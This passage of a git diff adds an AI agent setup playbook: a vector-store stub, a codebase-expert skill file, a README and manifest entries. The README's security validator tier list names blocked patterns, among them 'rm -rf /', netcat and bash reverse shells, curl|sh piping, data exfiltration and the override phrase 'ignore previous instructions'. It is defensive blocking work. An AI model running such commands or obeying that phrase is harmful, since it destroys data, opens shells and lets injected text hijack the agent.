Placeholder for actual file system operations + } + + /** + * Persist registry to config file + */ + private persist(): void { + // Implementation
would write to YAML config + // Placeholder for actual file system operations + } +} + +export default Registry; diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/vector-store.ts b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/vector-store.ts new file mode 100644 index 0000000..ec6880b --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/vector-store.ts @@ -0,0 +1,143 @@ +/** + * Vector Store + * + * In-memory vector storage for semantic search. + */ + +import { cosineSimilarity } from './embeddings'; + +interface VectorEntry { + id: string; + content: string; + embedding: number[]; + metadata?: Record<string, unknown>; +} + +interface SearchResult { + id: string; + content: string; + score: number; + metadata?: Record<string, unknown>; +} + +interface SearchOptions { + limit?: number; + minScore?: number; + filter?: (entry: VectorEntry) => boolean; +} + +/** + * Vector store for a single knowledge pack + */ +export class VectorStore { + private static stores: Map<string, VectorStore> = new Map(); + + private packId: string; + private entries: Map<string, VectorEntry> = new Map(); + + private constructor(packId: string) { + this.packId = packId; + } + + /** + * Get or create a vector store for a pack + */ + static forPack(packId: string): VectorStore { + if (!VectorStore.stores.has(packId)) { + VectorStore.stores.set(packId, new VectorStore(packId)); + } + return VectorStore.stores.get(packId)!; + } + + /** + * Add an entry to the store + */ + add(entry: VectorEntry): void { + this.entries.set(entry.id, entry); + } + + /** + * Add multiple entries + */ + addAll(entries: VectorEntry[]): void { + for (const entry of entries) { + this.add(entry); + } + } + + /** + * Remove an entry + */ + remove(id: string): boolean { + return this.entries.delete(id); + } + + /** + * Search for similar entries + */ + async search( + queryEmbedding: number[], + options: SearchOptions = {} + ): Promise<SearchResult[]> { + const { + limit = 10,
minScore = 0.0, + filter, + } = options; + + const results: SearchResult[] = []; + + for (const entry of this.entries.values()) { + // Apply filter if provided + if (filter && !filter(entry)) { + continue; + } + + const score = cosineSimilarity(queryEmbedding, entry.embedding); + + if (score >= minScore) { + results.push({ + id: entry.id, + content: entry.content, + score, + metadata: entry.metadata, + }); + } + } + + // Sort by score descending and limit + return results + .sort((a, b) => b.score - a.score) + .slice(0, limit); + } + + /** + * Get store size + */ + size(): number { + return this.entries.size; + } + + /** + * Clear all entries + */ + clear(): void { + this.entries.clear(); + } + + /** + * Persist store to disk + */ + async persist(path: string): Promise<void> { + // Implementation would serialize and write to disk + } + + /** + * Load store from disk + */ + async load(path: string): Promise<void> { + // Implementation would read and deserialize from disk + } +} + +export default VectorStore; diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/templates/skills/codebase-expert/SKILL.md b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/templates/skills/codebase-expert/SKILL.md new file mode 100644 index 0000000..b5b2456 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/templates/skills/codebase-expert/SKILL.md @@ -0,0 +1,43 @@ +--- +name: codebase-expert +description: Deep expertise in the current codebase with semantic search and contextual understanding. USE WHEN user asks about code structure, architecture, implementations, or wants to find specific functionality, classes, or functions. +--- + +# codebase-expert + +## Overview + +Deep expertise in the current codebase, providing semantic search and contextual understanding of code structure, patterns, and implementation details.
+ +## Capabilities + +### Code Search +- Semantic search across all indexed files +- Find functions, classes, and modules by description +- Locate implementations of specific features + +### Architecture Understanding +- Directory structure and organization +- Module relationships and dependencies +- Entry points and exports + +### Pattern Recognition +- Common patterns used in the codebase +- Coding conventions and standards +- Architectural decisions + +## Usage + +This skill automatically activates when you ask about: +- Code structure ("How is the project organized?") +- Implementations ("Where is X implemented?") +- Functionality ("How does Y work?") +- Finding code ("Find the function that does Z") + +## Context Injection + +When active, relevant code snippets are automatically retrieved and provided as context for more accurate responses. + +--- + +*codebase-expert Skill v1.0.0* diff --git a/Setup/OpenCode-Cognitive-Infrastructure/README.md b/Setup/OpenCode-Cognitive-Infrastructure/README.md new file mode 100644 index 0000000..b5a74b8 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/README.md @@ -0,0 +1,228 @@ +# OpenCode Cognitive Infrastructure Setup + +Deploys the complete OpenCode Cognitive Infrastructure to any agent directory, enabling persistent memory, modular skills, context management, and event-driven plugins. 
+ +## What This Playbook Does + +This playbook creates the foundational `.opencode/` directory structure that gives OpenCode-based agents their cognitive capabilities: + +- **Plugin System** - Event-driven automation with security validation, session management, and event logging +- **Memory System** - Three-tier persistent knowledge (hot/warm/cold) for session history, learnings, and state +- **Skills Framework** - Modular domain expertise with on-demand loading and USE WHEN activation +- **Configuration** - opencode.json and config files for customization + +## Infrastructure Structure + +After running this playbook, the agent will have: + +``` +Agent Directory/ +├── AGENTS.md # Agent identity (single source of truth) +├── opencode.json # Main configuration +└── .opencode/ + ├── VERSION # Infrastructure version tracking + ├── config/ + │ └── config.yaml # Runtime settings + ├── skill/ + │ ├── core/ + │ │ └── SKILL.md # Core identity skill + │ └── create-skill/ + │ └── SKILL.md # Skill creation skill + ├── plugin/ + │ ├── security-validator.ts # 10-tier attack pattern blocking + │ ├── session-manager.ts # Session lifecycle handling + │ ├── event-logger.ts # Tool execution logging + │ └── context-loader.ts # Context initialization + ├── memory/ + │ ├── README.md # Memory system docs + │ ├── state/ # Operational state + │ ├── signals/ # Pattern detection + │ ├── work/ # Per-task memory + │ ├── learning/ # Phase-based learnings + │ │ ├── observe/ + │ │ ├── think/ + │ │ ├── plan/ + │ │ ├── build/ + │ │ ├── execute/ + │ │ └── verify/ + │ ├── research/ # Research outputs + │ ├── sessions/ # Session summaries + │ ├── learnings/ # Learning moments + │ ├── decisions/ # ADRs + │ ├── execution/ # Task logs + │ ├── security/ # Security events + │ ├── recovery/ # Recovery snapshots + │ ├── raw-outputs/ # JSONL event streams + │ └── backups/ # Pre-change backups + ├── command/ # Custom commands + ├── agents/ # Custom agent definitions + └── docs/ + ├── SKILLSYSTEM.md # Skill 
system docs + ├── MEMORYSYSTEM.md # Memory system docs + └── PLUGINSYSTEM.md # Plugin system docs +``` + +## Plugin System Features + +The playbook installs a complete plugin system with: + +| Plugin | Event | Purpose | +|--------|-------|---------| +| `security-validator.ts` | tool.execute.before | 10-tier attack pattern blocking | +| `session-manager.ts` | lifecycle | Session state management | +| `event-logger.ts` | tool.execute.after | Log tool executions to memory | +| `context-loader.ts` | startup | Load CORE skill context | + +### Security Validator Tiers + +1. **Catastrophic** - `rm -rf /`, disk destruction (BLOCK) +2. **Reverse Shells** - Bash/netcat/socket shells (BLOCK) +3. **Credential Theft** - curl|sh, wget|sh patterns (BLOCK) +4. **Prompt Injection** - "ignore previous instructions" (BLOCK) +5. **Environment Manipulation** - API key exposure (WARN) +6. **Git Dangerous** - force push, hard reset (WARN) +7. **System Modification** - chmod 777, sudo (LOG) +8. **Network Operations** - ssh, scp, rsync (LOG) +9. **Data Exfiltration** - upload patterns (BLOCK) +10. **Infrastructure Protection** - rm .opencode (BLOCK) + +## Memory System Features + +Three-tier memory architecture: + +| Tier | Temperature | Purpose | Location | +|------|-------------|---------|----------| +| **CAPTURE** | Hot | Active work items | `memory/work/` | +| **SYNTHESIS** | Warm | Phase-based learnings | `memory/learning/` | +| **APPLICATION** | Cold | Historical archive | `memory/sessions/`, etc. 
| + +## Skills System Features + +- **YAML Frontmatter** with `USE WHEN` activation triggers +- **Lowercase naming** convention with hyphens (e.g., `code-review`) +- **On-demand loading** - metadata at startup, full body on invocation +- **Claude-compatible** - works with `.claude/skills/` locations too +- **create-skill** skill for generating new skills + +## Comparison: Claude Code vs OpenCode + +| Feature | Claude Code | OpenCode | +|---------|-------------|----------| +| Config directory | `.claude/` | `.opencode/` | +| Main config | `.claude/settings.json` | `opencode.json` | +| Identity file | `CLAUDE.md` | `AGENTS.md` | +| Hooks/Plugins | Shell command hooks | TypeScript plugins | +| Skills location | `.claude/skills/` | `.opencode/skill/` | +| Skill naming | TitleCase | lowercase-with-hyphens | +| Memory | `.claude/MEMORY/` | `.opencode/memory/` | + +## Prerequisites + +- An agent directory where you want to install the infrastructure +- The agent should have a clear purpose/role (used to generate identity) +- **Node.js** (v18+) or **Bun** runtime for TypeScript plugins +- **OpenCode CLI** installed - https://opencode.ai + +## Usage + +Run this playbook in the target agent's directory. The playbook will: + +1. Analyze the agent's purpose from directory name and any existing files +2. Generate appropriate agent identity (name, mission, role) +3. Create the complete `.opencode/` directory structure +4. Install the Plugin System with security validator +5. Initialize the Memory System with three-tier architecture +6. Create the Skills Framework with core and create-skill +7. Verify the installation + +## After Installation + +Once the infrastructure is installed, you can: + +1. Configure **MCP servers** for external tool integrations +2. Add **custom skills** for domain expertise +3. Customize the AGENTS.md with additional instructions +4. Add custom **plugins** for automation +5. Create **custom commands** for reusable prompts +6. 
Start using the agent with full cognitive capabilities

## Git Configuration

### What to Commit

| Path | Commit? | Reason |
|-----------|---------|--------|
| `opencode.json` | Yes | Main configuration |
| `.opencode/VERSION` | Yes | Infrastructure version |
| `.opencode/config/` | Yes | Runtime settings |
| `.opencode/skill/` | Yes | Skill definitions |
| `.opencode/plugin/` | Yes | Plugin code |
| `.opencode/docs/` | Yes | Documentation |
| `.opencode/memory/state/` | No | Session state |
| `.opencode/memory/signals/` | No | Pattern detection |
| `.opencode/memory/work/` | No | Active work items |
| `.opencode/memory/raw-outputs/` | No | Event logs |
| `.opencode/memory/sessions/` | No | Session history |
| `.opencode/memory/security/` | No | Security events |
| `AGENTS.md` | Yes | Agent identity |

### Recommended .gitignore

Note the `/*` suffix on each memory directory: git cannot re-include a file (such as `.gitkeep`) whose parent directory is itself ignored, so the patterns must ignore the directory *contents* rather than the directory.

```gitignore
# OpenCode Cognitive Infrastructure - Private Data
.opencode/memory/raw-outputs/*
.opencode/memory/sessions/*
.opencode/memory/security/*
.opencode/memory/state/*
.opencode/memory/signals/*
.opencode/memory/work/*

# Keep structure but ignore contents
!.opencode/memory/raw-outputs/.gitkeep
!.opencode/memory/sessions/.gitkeep
!.opencode/memory/security/.gitkeep
!.opencode/memory/state/.gitkeep
!.opencode/memory/signals/.gitkeep
!.opencode/memory/work/.gitkeep
```

## MCP Server Integration

OpenCode supports MCP (Model Context Protocol) servers for external tools. Add to `opencode.json`:

```json
{
  "mcp": {
    "context7": {
      "type": "remote",
      "url": "https://mcp.context7.com",
      "enabled": true
    }
  }
}
```

## Version Migration

### Upgrading Infrastructure

1. **Check current version**: Read `.opencode/VERSION`
2. **Backup existing**: `cp -r .opencode .opencode.backup`
3. **Run upgrade playbook**: Future versions will include migration scripts
4. 
**Verify**: Run the 5_VERIFY phase to confirm upgrade success + +### Version History + +| Version | Changes | +|---------|---------| +| 1.0.0 | Initial release with plugin system, memory system, skills framework | + +## Version + +Current infrastructure version: **1.0.0** + +## Credits + +The OpenCode Cognitive Infrastructure is adapted from the Claude Cognitive Infrastructure, which was influenced by [Daniel Miessler's](https://danielmiessler.com/) [Personal AI Infrastructure](https://github.com/danielmiessler/Personal_AI_Infrastructure) project. + +OpenCode documentation and plugin system based on the official [OpenCode documentation](https://opencode.ai/docs/). + +--- + +*OpenCode Cognitive Infrastructure Setup Playbook* diff --git a/manifest.json b/manifest.json index b9af1c1..7751437 100644 --- a/manifest.json +++ b/manifest.json @@ -177,6 +177,52 @@ "loopEnabled": true, "maxLoops": 10, "prompt": null + }, + { + "id": "setup-cognitive-infrastructure", + "title": "Claude Cognitive Infrastructure", + "description": "Deploys the complete Claude Cognitive Infrastructure to any agent directory, enabling persistent memory, modular skills, context management, and event-driven hooks.", + "category": "Setup", + "subcategory": "Claude-Cognitive-Infrastructure", + "author": "Stephan Chenette", + "authorLink": "https://github.com/stephanchenette", + "tags": ["infrastructure", "memory", "skills", "context", "hooks", "agent-setup"], + "lastUpdated": "2026-01-10", + "path": "Setup/Claude-Cognitive-Infrastructure", + "documents": [ + { "filename": "0_INITIALIZE", "resetOnCompletion": false }, + { "filename": "1_ANALYZE", "resetOnCompletion": false }, + { "filename": "2_PLAN_STRUCTURE", "resetOnCompletion": false }, + { "filename": "3_EVALUATE", "resetOnCompletion": false }, + { "filename": "4_IMPLEMENT", "resetOnCompletion": false }, + { "filename": "5_VERIFY", "resetOnCompletion": false } + ], + "loopEnabled": false, + "maxLoops": 1, + "prompt": null + }, + { + "id": 
"setup-knowledge-pack-codebase-expert", + "title": "Codebase Expert Knowledge Pack", + "description": "Installs the Codebase Expert knowledge pack, enabling RAG-powered code understanding with semantic search across the codebase.", + "category": "Setup", + "subcategory": "Knowledge-Packs", + "author": "Stephan Chenette", + "authorLink": "https://github.com/stephanchenette", + "tags": ["knowledge-pack", "codebase", "rag", "semantic-search", "code-understanding"], + "lastUpdated": "2026-01-10", + "path": "Setup/Knowledge-Packs/Codebase-Expert", + "documents": [ + { "filename": "0_INITIALIZE", "resetOnCompletion": false }, + { "filename": "1_ANALYZE", "resetOnCompletion": false }, + { "filename": "2_PLAN_STRUCTURE", "resetOnCompletion": false }, + { "filename": "3_EVALUATE", "resetOnCompletion": false }, + { "filename": "4_IMPLEMENT", "resetOnCompletion": false }, + { "filename": "5_VERIFY", "resetOnCompletion": false } + ], + "loopEnabled": false, + "maxLoops": 1, + "prompt": null } ] }